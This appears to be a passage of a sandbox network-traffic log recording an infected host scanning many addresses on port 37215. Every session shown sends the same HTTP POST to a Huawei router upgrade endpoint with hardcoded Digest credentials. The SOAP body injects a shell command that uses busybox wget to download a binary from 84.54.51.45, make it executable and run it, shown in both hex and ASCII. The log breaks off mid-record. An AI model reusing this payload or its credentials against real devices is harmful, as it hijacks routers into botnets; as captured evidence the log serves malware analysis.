                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1059192.168.2.153485841.142.45.23237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.912748098 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1060192.168.2.155505841.117.196.14937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.912769079 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1061192.168.2.154946041.5.33.4537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.912830114 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1062192.168.2.153412641.88.129.11137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.912831068 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1063192.168.2.153915441.212.247.6637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.912830114 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1064192.168.2.154412841.172.84.12337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.912831068 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1065192.168.2.155851041.117.161.4437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.912926912 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1066192.168.2.153507241.118.127.19837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.912951946 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1067192.168.2.154585441.119.130.9637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.912956953 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1068192.168.2.154481041.87.16.19837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.912977934 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 